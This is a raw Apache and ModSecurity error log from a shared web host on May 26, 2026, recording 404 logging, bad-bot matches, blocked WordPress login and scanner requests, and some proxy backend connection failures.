[Tue May 26 17:50:01.662792 2026] [security2:error] [pid 937900:tid 938062] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP8U4hPNS8CpkGLtbKWAAAAKU"]
[Tue May 26 17:50:02.816344 2026] [security2:error] [pid 937900:tid 938115] [client 31.57.184.107:55840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWP8k4hPNS8CpkGLtbKhAAAANo"]
[Tue May 26 17:50:04.551258 2026] [security2:error] [pid 937900:tid 938125] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP9E4hPNS8CpkGLtbKsgAAAOQ"]
[Tue May 26 17:50:05.101670 2026] [security2:error] [pid 937900:tid 938151] [client 142.93.7.200:39316] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWP9E4hPNS8CpkGLtbKwwAAAP4"]
[Tue May 26 17:50:06.162820 2026] [security2:error] [pid 937900:tid 938011] [remote 52.18.195.140:35674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWP9U4hPNS8CpkGLtbK2QAAy24"]
[Tue May 26 17:50:07.207235 2026] [security2:error] [pid 937900:tid 938153] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP9k4hPNS8CpkGLtbK8gAAAQA"]
[Tue May 26 17:50:08.420660 2026] [security2:error] [pid 937900:tid 938092] [client 142.93.7.200:39336] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWP-E4hPNS8CpkGLtbLIwAAAMM"]
[Tue May 26 17:50:09.235037 2026] [security2:error] [pid 937900:tid 938104] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP-E4hPNS8CpkGLtbLMwAAAM8"]
[Tue May 26 17:50:11.229315 2026] [security2:error] [pid 937900:tid 938031] [client 193.93.230.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP-04hPNS8CpkGLtbLcQAAAIY"], referer: https://www.anujtradingco.com/
[Tue May 26 17:50:11.534741 2026] [security2:error] [pid 937900:tid 938047] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP-04hPNS8CpkGLtbLawAAAJY"]
[Tue May 26 17:50:12.081068 2026] [security2:error] [pid 937900:tid 938157] [client 193.93.230.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWP_E4hPNS8CpkGLtbLkgAAAQQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1213919&moderation-hash=c8bb8f17c7fe94677e21b126973d419a
[Tue May 26 17:50:12.101342 2026] [security2:error] [pid 937900:tid 938086] [client 208.91.198.85:40558] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWP_E4hPNS8CpkGLtbLkwAAAL0"]
[Tue May 26 17:50:12.103987 2026] [security2:error] [pid 937900:tid 938050] [client 74.7.228.13:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.rehobothindependentcare.com"] [uri "/index.php"] [unique_id "ahWP-04hPNS8CpkGLtbLgAAAAJk"]
[Tue May 26 17:50:12.104007 2026] [security2:error] [pid 937900:tid 938050] [client 74.7.228.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.rehobothindependentcare.com"] [uri "/index.php"] [unique_id "ahWP-04hPNS8CpkGLtbLgAAAAJk"]
[Tue May 26 17:50:12.108898 2026] [security2:error] [pid 937900:tid 938150] [client 74.7.228.13:33960] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.rehobothindependentcare.com"] [uri "/robots.txt"] [unique_id "ahWP-04hPNS8CpkGLtbLfgAA_S8"]
[Tue May 26 17:50:12.224889 2026] [security2:error] [pid 937900:tid 938098] [client 208.91.198.85:40574] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWP_E4hPNS8CpkGLtbLlAAAAMk"]
[Tue May 26 17:50:12.227157 2026] [security2:error] [pid 937900:tid 938089] [client 74.7.230.10:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rehobothindependentcare.com.taotechservices.com"] [uri "/index.php"] [unique_id "ahWP-04hPNS8CpkGLtbLhwAAAMA"]
[Tue May 26 17:50:12.228038 2026] [security2:error] [pid 937900:tid 938082] [client 74.7.230.10:38228] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rehobothindependentcare.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWP-04hPNS8CpkGLtbLhAAAuSc"]
[Tue May 26 17:50:12.276307 2026] [security2:error] [pid 937900:tid 938072] [client 208.91.198.85:40584] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWP_E4hPNS8CpkGLtbLmQAAAK8"]
[Tue May 26 17:50:12.377348 2026] [security2:error] [pid 937900:tid 938045] [client 208.91.198.85:40590] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWP_E4hPNS8CpkGLtbLnAAAAJQ"]
[Tue May 26 17:50:12.702748 2026] [security2:error] [pid 937900:tid 938077] [client 74.7.228.13:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/index.php"] [unique_id "ahWP_E4hPNS8CpkGLtbLnwAAALQ"], referer: https://www.rehobothindependentcare.com/robots.txt
[Tue May 26 17:50:12.703713 2026] [security2:error] [pid 937900:tid 938143] [client 74.7.228.13:33974] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/robots.txt"] [unique_id "ahWP_E4hPNS8CpkGLtbLnQAA9iM"], referer: https://www.rehobothindependentcare.com/robots.txt
[Tue May 26 17:50:13.587917 2026] [security2:error] [pid 937900:tid 938074] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP_U4hPNS8CpkGLtbLuQAAALE"]
[Tue May 26 17:50:15.805608 2026] [security2:error] [pid 937900:tid 938148] [client 193.93.230.152:27333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 152.230.93.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWP_04hPNS8CpkGLtbL_wAAAPs"], referer: https://anujtradingco.com
[Tue May 26 17:50:16.256690 2026] [security2:error] [pid 937900:tid 938041] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWP_04hPNS8CpkGLtbMCAAAAJA"]
[Tue May 26 17:50:16.613901 2026] [security2:error] [pid 937900:tid 938105] [client 193.93.230.152:27569] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWQAE4hPNS8CpkGLtbMHAAAANA"], referer: https://anujtradingco.com
[Tue May 26 17:50:18.622480 2026] [security2:error] [pid 937900:tid 938082] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQAk4hPNS8CpkGLtbMRAAAALk"]
[Tue May 26 17:50:19.706075 2026] [proxy:error] [pid 937900:tid 938111] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:50:19.706131 2026] [proxy_http:error] [pid 937900:tid 938111] [client 137.184.227.207:34562] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:50:19.706731 2026] [proxy:error] [pid 937900:tid 938111] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:50:19.706765 2026] [proxy_http:error] [pid 937900:tid 938111] [client 137.184.227.207:34562] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:50:19.864861 2026] [proxy:error] [pid 937900:tid 938136] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:50:19.864964 2026] [proxy_http:error] [pid 937900:tid 938136] [client 137.184.227.207:34566] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.cti.hn/
[Tue May 26 17:50:19.865873 2026] [proxy:error] [pid 937900:tid 938136] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:50:19.865925 2026] [proxy_http:error] [pid 937900:tid 938136] [client 137.184.227.207:34566] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.cti.hn/
[Tue May 26 17:50:20.198319 2026] [core:error] [pid 937900:tid 938063] [client 137.184.227.207:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:50:20.198344 2026] [core:error] [pid 937900:tid 938063] [client 137.184.227.207:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:50:20.986276 2026] [security2:error] [pid 937900:tid 938065] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQBE4hPNS8CpkGLtbMhQAAAKg"]
[Tue May 26 17:50:22.577715 2026] [security2:error] [pid 937900:tid 938088] [client 182.69.176.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQBk4hPNS8CpkGLtbMrAAAAL8"]
[Tue May 26 17:50:23.207757 2026] [security2:error] [pid 937900:tid 938096] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQBk4hPNS8CpkGLtbMvQAAAMc"]
[Tue May 26 17:50:25.704207 2026] [security2:error] [pid 937900:tid 938141] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQCU4hPNS8CpkGLtbNCQAAAPQ"]
[Tue May 26 17:50:28.097171 2026] [security2:error] [pid 937900:tid 938096] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQC04hPNS8CpkGLtbNTgAAAMc"]
[Tue May 26 17:50:30.293373 2026] [security2:error] [pid 937900:tid 938156] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQDU4hPNS8CpkGLtbNmQAAAQM"]
[Tue May 26 17:50:30.911157 2026] [security2:error] [pid 937900:tid 937914] [remote 57.141.2.65:56012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWQDk4hPNS8CpkGLtbN1QABAA0"]
[Tue May 26 17:50:31.816098 2026] [security2:error] [pid 937900:tid 938143] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN7wAA9hw"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.817373 2026] [security2:error] [pid 937900:tid 938068] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN8AAAqxM"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.818824 2026] [security2:error] [pid 937900:tid 938041] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN8QAAkBs"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.958823 2026] [security2:error] [pid 937900:tid 938078] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN9wAAtSI"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.973563 2026] [security2:error] [pid 937900:tid 938102] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN9AAAzR4"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.983115 2026] [security2:error] [pid 937900:tid 938144] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN_gAA9yk"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.983771 2026] [security2:error] [pid 937900:tid 938135] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN9QAA7iU"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.983935 2026] [security2:error] [pid 937900:tid 938157] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN_QABBFk"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.986024 2026] [security2:error] [pid 937900:tid 938087] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN8gAAvhk"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.986666 2026] [security2:error] [pid 937900:tid 938156] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOAgABAyw"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.987795 2026] [security2:error] [pid 937900:tid 938131] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN8wAA6iA"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.989126 2026] [security2:error] [pid 937900:tid 938033] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN_AAAiB8"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.989313 2026] [security2:error] [pid 937900:tid 938055] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOBAAAnkA"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.990149 2026] [security2:error] [pid 937900:tid 938091] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN-QAAwic"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.990224 2026] [security2:error] [pid 937900:tid 938142] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN-AAA9S8"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.991778 2026] [security2:error] [pid 937900:tid 938122] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN-gAA4SE"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.993554 2026] [security2:error] [pid 937900:tid 938074] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOAQAAsSo"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.993612 2026] [security2:error] [pid 937900:tid 938120] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOCwAA3z8"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.998471 2026] [security2:error] [pid 937900:tid 938092] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOCAAAw0Q"], referer: https://ndequipments.com/
[Tue May 26 17:50:31.999446 2026] [security2:error] [pid 937900:tid 938062] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOAAAApT4"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.000703 2026] [security2:error] [pid 937900:tid 938155] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOAwABAi0"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.003574 2026] [security2:error] [pid 937900:tid 938082] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOBgAAuSY"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.006246 2026] [security2:error] [pid 937900:tid 937966] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbODAAAzEE"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.006422 2026] [security2:error] [pid 937900:tid 938043] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOBwAAkkM"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.007730 2026] [security2:error] [pid 937900:tid 938133] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN_wAA7CM"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.008160 2026] [security2:error] [pid 937900:tid 938113] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOCgAA2Ec"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.013128 2026] [security2:error] [pid 937900:tid 938090] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOBQAAwSs"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.014929 2026] [security2:error] [pid 937900:tid 938097] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbOCQAAyEU"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.017465 2026] [security2:error] [pid 937900:tid 938035] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbN-wAAih0"], referer: https://ndequipments.com/
[Tue May 26 17:50:32.021005 2026] [security2:error] [pid 937900:tid 938145] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQD04hPNS8CpkGLtbODQAA-EI"], referer: https://ndequipments.com/
